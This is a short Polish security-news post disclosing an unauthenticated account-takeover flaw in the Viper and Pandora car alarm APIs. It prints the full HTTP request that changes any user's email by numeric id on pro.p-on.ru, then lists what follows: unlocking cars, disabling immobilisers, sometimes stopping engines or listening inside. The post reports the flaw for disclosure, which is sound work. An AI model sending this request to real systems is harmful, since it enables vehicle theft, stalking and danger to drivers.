Alarmy samochodowe 2 popularnych firm – totalnie hackowalne. Można przejąc / śledzić samochody

Chodzi o dwie bardzo popularne firmy (+ te same rozwiązania, tylko subbrandowane): Viper oraz Pandora

Viper is the world’s best selling vehicle security and remote start brand. We use cutting-edge technology to make sure you are in control, providing range and features you can count on every time.

Jak przystało na topowy alarm samochodowy, musi on mieć aplikacje mobilną. Aplikacja mobilna jest połączona z API w Internecie, a całe rozwiązanie jak zapewnia jeden z producentów jest ‘unhackable’.

Jak też przystało na nowoczesny świat – rządzi nim marketing, więc w miodnym ‘unhackable’ chodziło tylko o to, żeby dało się wszystko łatwiej sprzedać :) Natomiast wspominane powyżej API ma banalną podatność umożliwiającą bez uwierzytelnienia zmianę hasła dowolnemu użytkownikowi (wystarczy podać jego id, które jest najzwyklejszą liczbą). Odpowiednie żądanie HTTP wygląda tak:

POST /api/sputnik/workers?id=xxxxx HTTP/1.1
Host: pro.p-on.ru
Connection: close
Content-Length: 167
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://pro.p-on.ru
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json
Referer: https://pro.p-on.ru/workers/185000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: lang=en; sid=4020f4ba21edb3082902e227937995d6

{"id":xxxxx,"name_f":"name","name_i":"name_i","name_o":"name_o","groups":[],"email":"newemail","type":"user","company_perms":0}

Zmieniamy maila przypisanego do konta, wysyłamy reset hasła, mamy konto. Co dalej? Dalej można:

• Otwierać zdalnie samochód (!)
• Włączać alarm
• Włączać / wyłączać immobiliser
• Czasem (zależy od parametrów skonfigurowanych w alarmie) wyłączać silnik w trakcie pracy
• Czasem (zależy od parametrów skonfigurowanych w alarmie) słuchać zdalnie wnętrze samochodu

Filmik demo tutaj:

–ms